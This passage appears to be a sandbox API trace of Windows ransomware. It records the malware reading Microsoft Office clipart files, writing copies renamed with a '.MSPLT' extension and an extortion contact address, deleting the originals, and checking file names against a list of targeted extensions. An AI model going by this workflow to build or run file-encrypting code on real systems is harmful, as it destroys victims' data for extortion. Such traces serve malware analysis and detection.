"c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf")) returned 0x220 [0295.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0295.102] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.102] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0295.103] GetLastError () returned 0x0 [0295.103] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x12c8, lpOverlapped=0x0) returned 1 [0295.180] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x12d0, lpOverlapped=0x0) returned 1 [0295.181] ReadFile (in: hFile=0x440, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.181] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.181] SetEndOfFile (hFile=0x42c) returned 1 [0295.182] CloseHandle (hObject=0x42c) returned 1 [0295.186] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.186] SetEndOfFile (hFile=0x440) returned 1 [0295.190] CloseHandle (hObject=0x440) returned 1 [0295.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.192] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0295.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.193] lstrlenW (lpString=".doc") returned 4 [0295.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.193] lstrlenW (lpString=".docx") returned 5 [0295.193] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.193] lstrlenW (lpString=".pdf") returned 4 [0295.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.193] lstrlenW (lpString=".xls") returned 4 [0295.193] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.193] lstrlenW (lpString=".xlsx") returned 5 [0295.193] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.193] lstrlenW (lpString=".ppt") returned 4 [0295.193] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.193] lstrlenW (lpString=".zip") returned 4 [0295.193] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.193] lstrlenW (lpString=".rar") returned 4 [0295.193] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.193] lstrlenW (lpString=".bz2") returned 4 [0295.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString=".7z") returned 3 [0295.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.194] lstrlenW (lpString=".dbf") returned 4 [0295.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.194] lstrlenW (lpString=".1cd") returned 4 [0295.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.194] lstrlenW (lpString=".jpg") returned 4 [0295.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.194] lstrlenW (lpString=".doc") returned 4 [0295.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString=".docx") returned 5 [0295.194] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.194] lstrlenW (lpString=".pdf") returned 4 [0295.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.194] lstrlenW (lpString=".xls") returned 4 [0295.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.195] lstrlenW (lpString=".xlsx") returned 5 [0295.195] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.195] lstrlenW (lpString=".ppt") returned 4 [0295.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.195] lstrlenW (lpString=".zip") returned 4 [0295.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.195] lstrlenW (lpString=".rar") returned 4 [0295.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.195] lstrlenW (lpString=".bz2") returned 4 [0295.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.195] lstrlenW (lpString=".7z") returned 3 [0295.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.195] lstrlenW (lpString=".dbf") returned 4 [0295.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.195] lstrlenW (lpString=".1cd") returned 4 [0295.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0295.217] lstrlenW (lpString=".jpg") returned 4 [0295.217] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.217] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.217] lstrlenW (lpString="AN04384_.WMF") returned 12 [0295.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.240] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=4996) returned 1 [0295.240] CloseHandle (hObject=0x464) returned 1 [0295.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf")) returned 0x220 [0295.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.241] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.241] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0295.242] GetLastError () returned 0x0 [0295.242] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1384, lpOverlapped=0x0) returned 1 [0295.269] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1390, lpOverlapped=0x0) returned 1 [0295.270] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.270] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.271] SetEndOfFile (hFile=0x37c) returned 1 [0295.271] CloseHandle (hObject=0x37c) returned 1 [0295.273] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.274] SetEndOfFile (hFile=0x464) returned 1 [0295.281] CloseHandle (hObject=0x464) returned 1 [0295.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0295.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.283] lstrlenW (lpString=".doc") returned 4 [0295.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.283] lstrlenW (lpString=".docx") returned 5 [0295.283] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.283] lstrlenW (lpString=".pdf") returned 4 [0295.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.283] lstrlenW (lpString=".xls") returned 4 [0295.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.283] lstrlenW (lpString=".xlsx") returned 5 [0295.283] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.283] lstrlenW (lpString=".ppt") returned 4 [0295.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.283] lstrlenW (lpString=".zip") returned 4 [0295.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.283] lstrlenW (lpString=".rar") returned 4 [0295.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.283] lstrlenW (lpString=".bz2") returned 4 [0295.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.283] lstrlenW (lpString=".7z") returned 3 [0295.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString=".dbf") returned 4 [0295.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString=".1cd") returned 4 [0295.284] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString=".jpg") returned 4 [0295.284] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString=".doc") returned 4 [0295.284] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString=".docx") returned 5 [0295.284] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.284] lstrlenW (lpString=".pdf") returned 4 [0295.284] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString=".xls") returned 4 [0295.284] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.284] lstrlenW (lpString=".xlsx") returned 5 [0295.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.284] lstrlenW (lpString=".ppt") returned 4 [0295.284] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.284] lstrlenW (lpString=".zip") returned 4 [0295.285] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.285] lstrlenW (lpString=".rar") returned 4 [0295.285] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.285] lstrlenW (lpString=".bz2") returned 4 [0295.285] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.285] lstrlenW (lpString=".7z") returned 3 [0295.285] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.285] lstrlenW (lpString=".dbf") returned 4 [0295.285] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.285] lstrlenW (lpString=".1cd") returned 4 [0295.285] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 68 [0295.285] lstrlenW (lpString=".jpg") returned 4 [0295.285] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.285] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.285] lstrlenW (lpString="AN04385_.WMF") returned 12 [0295.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.286] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=5004) returned 1 [0295.286] CloseHandle (hObject=0x464) returned 1 [0295.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf")) returned 0x220 [0295.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.287] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.287] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0295.288] GetLastError () returned 0x0 [0295.288] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x138c, lpOverlapped=0x0) returned 1 [0295.576] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1390, lpOverlapped=0x0) returned 1 [0295.577] ReadFile (in: hFile=0x464, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.577] WriteFile (in: hFile=0x37c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0295.577] SetEndOfFile (hFile=0x37c) returned 1 [0295.578] CloseHandle (hObject=0x37c) returned 1 [0295.580] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.580] SetEndOfFile (hFile=0x464) returned 1 [0295.585] CloseHandle (hObject=0x464) returned 1 [0295.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0295.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0295.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.587] lstrlenW (lpString=".doc") returned 4 [0295.587] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.587] lstrlenW (lpString=".docx") returned 5 [0295.587] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.587] lstrlenW (lpString=".pdf") returned 4 [0295.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString=".xls") returned 4 [0295.588] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.588] lstrlenW (lpString=".xlsx") returned 5 [0295.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.588] lstrlenW (lpString=".ppt") returned 4 [0295.588] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.588] lstrlenW (lpString=".zip") returned 4 [0295.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.588] lstrlenW (lpString=".rar") returned 4 [0295.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString=".bz2") returned 4 [0295.588] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString=".7z") returned 3 [0295.588] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.588] lstrlenW (lpString=".dbf") returned 4 [0295.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.588] lstrlenW (lpString=".1cd") returned 4 [0295.588] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.588] lstrlenW (lpString=".jpg") returned 4 [0295.588] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.589] lstrlenW (lpString=".doc") returned 4 [0295.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString=".docx") returned 5 [0295.589] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.589] lstrlenW (lpString=".pdf") returned 4 [0295.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString=".xls") returned 4 [0295.589] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.589] lstrlenW (lpString=".xlsx") returned 5 [0295.589] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.589] lstrlenW (lpString=".ppt") returned 4 [0295.589] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.589] lstrlenW (lpString=".zip") returned 4 [0295.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.589] lstrlenW (lpString=".rar") returned 4 [0295.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString=".bz2") returned 4 [0295.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.589] lstrlenW (lpString=".7z") returned 3 [0295.589] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.589] lstrlenW (lpString=".dbf") returned 4 [0295.589] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.590] lstrlenW (lpString=".1cd") returned 4 [0295.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 68 [0295.590] lstrlenW (lpString=".jpg") returned 4 [0295.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.590] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.590] lstrlenW (lpString="BD00173_.WMF") returned 12 [0295.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0295.591] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=16180) returned 1 [0295.591] CloseHandle (hObject=0x464) returned 1 [0295.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf")) returned 0x220 [0295.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 